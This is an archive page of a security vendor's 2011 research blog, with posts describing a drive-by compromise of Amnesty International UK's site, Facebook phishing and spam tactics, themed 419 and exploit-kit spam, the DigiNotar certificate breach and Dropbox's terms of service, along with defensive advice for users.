Archive for the ‘Current Events’ Category

Human Rights Group Used to Spy on Activists

Thursday, December 22nd, 2011

By Paul Royal, Research Consultant

Amnesty International’s UK website has been compromised and is serving drive-by downloads. Historical data indicates the website AIUK was compromised on or before Friday, December 16.

Details:

Visiting hxxp://www[.]amnesty[.]org[.]uk loads hxxp://3max[.]com[.]br/cgi-bin/ai/ai.html via an iframe. 3max.com.br, which itself is a legitimate but compromised Brazilian automotive website, loads malicious Java content (stolen from the Metasploit project), which targets CVE-2011-3544. If the exploit is successful, malware is installed on the visitor’s system.

Details of Vulnerability Targeted by the Exploit
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544
VirusTotal Detections for Exploit
http://www.virustotal.com/file-scan/report.html?id=1cc214cee10f02d37359c0e3d04fd57899333c4b1eaa81489c74e5c2fa17c3a8-1324068153
VirusTotal Detections for Exploit Payload
http://www.virustotal.com/file-scan/report.html?id=0e53832e1c36d34a3d05c05f73ebab22a74ade95c5f3b7d9f74fad4f56d10023-1324067892

The exploit payload possesses properties of targeted malware but is being served by an exploit of a popular, public website. The working theory for this anomaly relates to Amnesty International as a human rights non-governmental organization. To explain, certain countries use zero day exploits and other techniques to gain electronic information about the activities of human rights activists. Of course, a subset of these activists are too smart to click on links in even well-worded spearphishing emails. But what if you compromised a website frequented by these activists (e.g., Amnesty International)? Then your targets come to you. The context-specific damage potential is significant.

Amnesty International UK has been notified about the compromise.

Share

Tags: , , , ,
Posted in Current Events, phishing, Research, Security, Uncategorized, Web Security | 1 Comment »

How your facebook password was stolen, and why

Monday, December 19th, 2011

by Dave Michmerhuizen & Luis Chapetti – Security Researchers

 

Here’s something we hear regularly at Barracuda Labs…

“My mom called me and said that someone posted something bad on her facebook.  How did they do that? What should I tell her?”

Our two-part answer is simple.  First, mom probably clicked on something and unwittingly gave it permission to post to her wall.  Second, there is always a possibility that mom had her password stolen.   She should change her Facebook password at once, as well as change the password on any service where she might have used that same password.

Facebook passwords do get stolen.  Below is one example of how that happens.

 

It starts with a message like this one that spreads from one wall to another.

malicious facebook post

Clicking on the link in the message opens up what looks like a Facebook login page.

fake facebook login page

(click to open full-size image)

Facebook will pop up a login page in certain situations to make certain that you are properly authenticated.   In this case the login page is entirely fake and is not part of Facebook at all.

Suppose you were in a hurry and didn’t take time to look at the URL of the page.   If you fill in your information and press the Login button, here’s what happens:

results of pressing 'Login'

(click for full-size image)

 

As you can see in the image, your exact username and password are sent off to the Russian domain.   Once this is done, the browser is sent to a Facebook themed ‘survey’ site.

facebook themed 'survey' site

(click for full-size image)

These ‘survey’ sites offer some gift in exchange for participating in an endless cycle of marketing schemes, many of which ask for personal information and none of which ever deliver the the promised gift.

 

The remaining question is why criminals steal Facebook passwords

and there are three good answers.

1. Personal information on your Facebook account can be used to piece together full-fledged identity theft.

2. A stolen Facebook account is the perfect vehicle for carrying out the Stranded Traveler scam.

3.  Survey scammers such as the ones shown here have to start their viral campaigns somewhere, and a stolen account, with its hundreds of trusting friends, is the perfect place to start.

 

With the new Facebook Timeline rolling out this week, users should be particularly careful with the personal information they make available on their pages.  As always, Barracuda Networks recommends that you be cautious with what you click on and change your password regularly as a matter of course.

Share

Posted in Current Events, ID Theft, Social Networking, Spam, Web Security | No Comments »

Barracuda Networks Turns ‘Follows’ and ‘Likes’ into Meals for Children in Need

Wednesday, November 30th, 2011

By: Barracuda Labs

FOR IMMEDIATE RELEASE

Content Security Leader Challenges World with “Clicks for Meals” to Fight Hunger and Provide 10,000 Meals this Holiday Season

Campbell, Calif. (November 30, 2011) – In an effort to combat world hunger, Barracuda Networks is challenging the world to help provide 10,000 meals for hungry children this holiday season. From November 30 until December 31, Barracuda Networks’ new one-for-one campaign−outlined at www.barracuda.com/clicksformeals−offers three free, simple ways everyone can help donate meals to starving children around the world.

Barracuda Networks will provide one meal for each of the following:

“We spend a lot of time analyzing how attackers use social networks for bad−stealing identities, creating fake profiles, spreading malware and so forth,” said Dr. Paul Judge, chief research officer of Barracuda Networks. “We want to use the social networks to do some good. What better way to do that than to use the power and ease of Facebook and Twitter to raise awareness and money to fight hunger.”

Barracuda Networks will work with the United Nations World Food Programme to fulfill the meal donation as they continue to fight hunger worldwide. Additional information–including a one-minute video–about the campaign is available at www.barracuda.com/clicksformeals.

“Attackers have proven time and again the enormous opportunity social networks create for malicious activity online,” continued Judge. “This initiative is a small token and acknowledgement of our continued fight to keep social networks safe and make an impact on thousands of children’s lives around the world.”

About Barracuda Profile Protector
Barracuda Profile Protector is a free service that protects social networking users against malicious threats on Facebook and Twitter. The application analyzes user-generated content posted to profiles and is able to block or remove malicious or suspicious content. This includes malicious URLs, embedded photos and/or videos on Facebook and Twitter pages and news feeds. Users can install Profile Protector at www.profileprotector.com.

About Barracuda Labs
Barracuda Labs is a global multi-disciplinary research and threat analysis team that fulfills a critical role in developing innovative technologies across Barracuda Networks’ business areas. The team evaluates the threat ecosystem and creates security intelligence to defend Barracuda Networks customers. Barracuda Labs’ threat research areas, which include email, Web, network and cloud security and technology, are designed to improve the world’s security posture by promoting security awareness and education, developing and innovating new defense technologies, and working with government and law enforcement agencies to reduce cybersecurity crime. For more information, please visit www.barracudalabs.com.

About Barracuda Networks Inc.
Barracuda Networks combines premises-based gateways and software, virtual appliances, cloud services, and sophisticated remote support to deliver comprehensive content and network security, data protection and application delivery solutions. The company’s expansive product portfolio includes offerings for protection against email and Web threats as well as products that improve application delivery and network access, message archiving, backup and data protection. Coca-Cola, FedEx, Harvard University, IBM, L’Oreal, and Europcar are among the more than 150,000 organizations protecting their IT infrastructures with Barracuda Networks’ range of affordable, easy-to-deploy and manage solutions. Barracuda Networks is privately held with its International Headquarters in Campbell, Calif. For more information, please visit www.barracudanetworks.com.

Share

Posted in Current Events, Social Networking | No Comments »

Seven Annoying Attacks That Facebook Misses

Wednesday, November 16th, 2011

This week Facebook experienced a rash of attacks that posted pornographic images. Some even claimed to be nude celebrities and others claimed to be child pornography. Last month we released survey results that showed that 40% of Facebook users do not feel safe on Facebook. Two weeks later, Facebook released an infographic showing its security initiatives and statistics. We applaud the efforts; however, more is needed. When you are trying to grow a social network as well as increase advertising revenue, security becomes not only a lower priority but sometimes a conflict of interest.

Facebook claims that only 0.5% of users experience spam on any given day. That is still 4 million people out of the 400 million users that log in on any given day. We suspect that measurement only counts spam that Facebook catches which is clearly not 100% of the spam. While working on Profile Protector and other web security intelligence, we regularly come across examples of spam and attacks that repeatedly use simliar approaches that are detectable. We compiled this list of seven annoying attacks that Facebook misses.

1) Fake Product Pages:

Knock off luxury goods have always been popular scams.  You might think you are buying your mother a nice new purse for a great price.  If you actually get the product, which is a bit of a long shot, you are likely to find that the quality you expected from the brand is lacking at best.  Facebook is rife with pages promoting these goods. Somehow these pages remain long-lived even after user complaints.  Once they finally are shut down there are already 8 duplicate pages running the same scam. Clearly there are some brands that just are not sitting on hundreds of photo albums on Facebook as their advertising platform. For example, Christian Louboutin, Louis Vuitton, Air Jordan and Beats By Dre.

 

2) Manipulated Accounts Recommendations:

On social networks those with less good motives have figured out how to game the recommendation system and use it to their advantage. This is very similar to how attackers have used search engine optimization to promote their malware. Friends are recommended in a variety of ways, but a simply exploited example is through shared apps.  Spammer accounts sign up for the same popular apps that real users do and before too long they are showing up in your list of recommended friends, which snowballs nicely into giving them a foothold into the recommended list for each of your friends.

 

3) Affiliate Spam:

Affiliate spam is a bigger and bigger part of the typical users incoming stream. Usually relying on the images of established and trusted brands these scams tend to be very successful and take little work for those who run them.  The hook is usually a free gift card or in some cases something as extravagant as a new iPad. They encourage or require the user to share it out to all their friends and say something like “I love olive garden” before being redirected to a never-ending series of offers in the form of premium text messaging, video rental and reoccurring subscriptions of all kinds that the user is required to sign up for to get the supposed “free” gift card.  A run featuring a Starbucks gift card was successful enough that Starbucks corporate had to comment letting users know it was not legitimate.


 

4) Photo Tagging For Spam:

The Facebook infographic referenced above mentions “Photo DNA” but it is likely that this is little more than a database of hashes related to explicit and exploitative images.  Photo tagging for spamming is one of the most popular methods of spamming through the network but it doesn’t seem to be getting much attention.  With each image uploaded a spammer can tag as many 50 other accounts in a photo, and have as many as 200 photos in an album.  With everyone in Facebook having a maximum of 5,000 friends each photo can reach a quarter million people.  This leads to a fairly nice multiplier for bytes uploaded vs users reached, especially on a network that people spend as much time on as Facebook.  Some basic image analysis will tell you if there are really 40 people in the picture or if it just a pair of Hello Kitty heels.

 

5) Fake Apps

Fake apps, malicious apps, misleading apps, whatever you want to call it, Facebook is overflowing with them.  New examples show up daily, often focusing on giving users features that they wish Facebook would provide.  After all, don’t we all want to know if that old flame still looks you up every few days. Or don’t we all wait for the launch of a ‘dislike’ button.  It is a big network and these are going to exist from time to time anywhere, but it is becoming more like the shareware sites of the late 90s where most the programs were of low quality and a relatively high percentage of them posed a risk.  Usually they are in the information gathering and spamming business, but we have found examples that link to malicious binaries.

 

6) Stolen Pictures

There is not really a set of sextuplets each with the same bikini picture as their personal profile picture. Those are fake accounts. The photo album that as the same two images-one of the front view of a bikini and the other with the back view of a different bikini-repeated 15 times each is not a real user. Certainly there are some images that will be common to multiple people such as a team logo or newly released album cover. However the fake accounts typically use images of a salacious nature.  Sex sells, and these profiles do very well at gathering followers around a fake identity, only to occasionally slip an advertisement into the stream.  Of course there is always the possibility that we’ve stumbled upon a set of identical sextuplets that would be very happy to reconnect…

 

7) Anomalous Behavior

Finally, Facebook and social networks in general should focus on some form of anomaly detection.  We’ve all seen examples of that friend who you never really talk to, and probably weren’t that interested in “friending” anyway, posting on your wall or messaging your account encouraging you get a free iPad or a trip on Southwest airlines, etc.  Similar problems have been appropriately mitigated elsewhere in messaging but social networks have a long way to go.  In many ways we’re seeing the same problems that the security community has been dealing with for more than a decade. Instead of SMTP and a distributed network, more and more messaging is pushed over HTTP and closed networks that give the receiver little that they can do in the way of securing themselves. Looking for behavior that is an outlier to the normal pattern is a well understood approach in other areas of network and messaging security. If someone that never uses chat is suddenly chatting with dozens of people and forwarding the same link, then there is a high likelihood of suspicious activity.

 

 

Share

Posted in Current Events, Internet Security Tips, Research, Security, Social Networking, Spam | No Comments »

Mommar Gaddafi – 419 spam’s new favorite subject

Friday, October 21st, 2011

by Dave Michmerhuizen & Luis Chapetti – Security Researchers

When you are engaged in direct marketing, your first order of business is to get the attention of your customer.  This is just as true for Nigerian 419 spammers as it is for everyone else, and widespread news coverage of the recent death of Mommar Gaddafi is a gift for the Lads from Lagos.

The spam monitors at Barracuda Labs have been detecting a steady stream of these spams, where the family of a dead African prince has been hastily replaced by the son of the dead Libyan dictator.

Gaddafi-themed spam

(Click for larger image)

 

Of course, by now, we hope that all email users recognize this sort of spam as an attempt to perpetrate Advance Fee Fraud. The spammers pump any respondent for personal financial information and then string them along with promises of millions of dollars once a few paltry ‘fees’ are paid in advance – thus the name, Advance Fee Fraud.

 

Barracuda Networks customers using the Barracuda Spam & Virus Firewall are protected from these emails.

Share

Posted in Current Events, Email Security, Spam | No Comments »

Spammers exploit Steve Jobs death

Friday, October 7th, 2011

By Dave Michmerhuizen – Security Researcher

Apple Chairman Steve Jobs passed away on October 5, 2011. We all share in the sadness of losing such a technology leader, visionary and innovator. Steve impacted our lives in a multitude of positive ways, through his spirit, his creativity and the word-class products he brought to market. Apple’s offerings are both mainstream tools and sources of joy – solving problems and brightening lives everyday, all over the world.  We wish for peace for Steve Jobs and his family.

Unfortunately while many are mourning, others are trying to take advantage of them. Only 24 hours after Jobs’ death spammers began sending insensitive emails claiming otherwise.

Steve Jobs spams

Spams like these capitalize on their shock value. The senders hope that you will be curious just long enough to let down your guard and click on the link.

By now we should all know that these links lead to no good.  Merely clicking on the link in one of these emails leads to a compromised website which redirects the browser multiple times, in some cases finally delivering it to a host serving up the BlackHole exploit kit.

Barracuda Labs is seeing more and more instances of spam linking to servers hosting these exploit kits.   They are increasingly popular with malware distributors because a link has been clicked no further user interaction is required to install their payload.

It saddens us to see these  emails in our honeypots.   Don’t let the amoral scum who send these things take advantage of you. If you see them, delete them right away.

 

Barracuda Networks customers using the Barracuda Spam & Virus Firewall are protected from these emails, while customers using Barracuda Web Filters or Barracuda Web Security Flex are protected from the payload.

Share

Posted in Current Events, Email Security, phishing, Spam, Web Security | No Comments »

Certificate Authority Hacked, Google Users Fall Victim to Man-in-the-Middle Attack

Tuesday, August 30th, 2011

by Daniel Peck, Research Scientist

Yesterday reports began to trickle in that Google users in Iran were victim to a man-in-the-middle attack through the use of an illegitimate SSL certificate issued for “*.google.com”.  This is the latest in a series of events involving a hacked Certificate Authority, but this time there was clear evidence that the fake certificate was being actively used.  Details of the attack and consequences are being written about extensively elsewhere, so we will give a brief overview and link to those directly involved and others with particularly insightful analysis.

The certificate being used was issued by a Dutch certificate authority, DigiNotar. The consequence is that this CA has essentially been given the “death penalty”. Microsoft, Mozilla and Google have removed the DigiNotar root certificate from their chain of trust and certificates signed by them will have no more trust than one you generate yourself.  It is good to see that those who have the strongest position when choosing which certificate authorities to trust are doing the right thing here, with a technology that so many people rely on for security, privacy and economic reason a “one strike and you’re out” system is appropriate.  With each attack similar to this one, we see that the current system of Certificate Authorities is quite open to abuse with the combination of centralized and opaque trust.  Compromises of that trust can have severe consequences.  The system is clearly broken, and while some are working on replacement solutions, it is what we have to use in the mean time.

Users are advised to remove the DigiNotar root certificate.

Firefox:
http://support.mozilla.com/en-US/kb/deleting-diginotar-ca-cert

Chrome:
http://googlechrometutorial.com/google-chrome-advanced-settings/Google-chrome-ssl-settings.html

IE:
Some newer versions of Windows seem to be automatically checking a CRL and therefore are able to provide protection without a software update: “All supported editions of Windows Vista, Windows 7, Windows Server 2008, and Windows Server 2008 R2 use the Microsoft Certificate Trust List to validate the trust of a certificate authority. There is no action required for users of these operating systems because Microsoft has removed the DigiNotar root certificate from the Microsoft Certificate Trust List.”

However older versions of Windows do not provide automatic protection:” Microsoft will release a future update to address this issue for all supported editions of Windows XP and Windows Server 2003.”

http://www.microsoft.com/technet/security/advisory/2607712.mspx

The DigiNotar root will be being removed from relevant Barracuda Networks products.

 

Further reading:

Google Online Security Blog: An Update on Attemped Man-in-the-Middle Attacks

DigiNotar Response: Diginotar Reports Security Incident

EFF: Iranian Man-in-the-Middle Attack Against Google Demonstrates Dangerous Weakness of Certificate Authorities

 

Tools/Possible SSL Alternatives for advanced users:

Certificate Patrol for Firefox

Convergence

 

Share

Posted in Current Events, Security, Web Security | No Comments »

DoSing the security community with a ToS

Wednesday, July 6th, 2011

by Daniel Peck, Research Scientist

The security community echo chamber was rocking hard over the weekend with news of an online backup/sharing service, Dropbox, changing its Terms of Service to grant them “worldwide, non-exclusive, royalty-free, sublicenseable rights to…” do basically anything they want with your content.  From Dropbox’s point of view, this is the sort of thing that they claim they need to have in order to provide you the service. That may or may not be true, but it was probably something their legal counsel told them that it would be in their best interest to include.

The odd part is that anyone in the security community was surprised by this. It does not matter what the ToS said. Fact of the matter is that if you are uploading information to a third-party that is not in an encrypted form that you control, then it needs to be considered public. The only question at that point is the length of time before everyone else knows its public.  Someone who isn’t you can read it and you’re putting your trust in them not to reveal it, share it, or profit from it. In practice this may mean that your information is never revealed or that it is revealed when someone compromises their service, or it may mean when they decide to change their ToS, which every ToS tends to allow the provider to do without much notice and little, if any, recourse.

Too many of us have forgotten, or never learned, that everything on the interwebs is public by default, unless you’re making a real effort to restrict access. Ultimately, there are just gradients of how public that information actually is. Dropbox and similar services are great for what they are, a convenient place to put slides and other random files that you want to be able to access or share easily and don’t mind if someone else sees if they put a little effort into doing so.  Essentially, it is an alternative to sending email with attachment, and it has about the same amount of (in)security.

Share

Tags: , , ,
Posted in Current Events, Security | No Comments »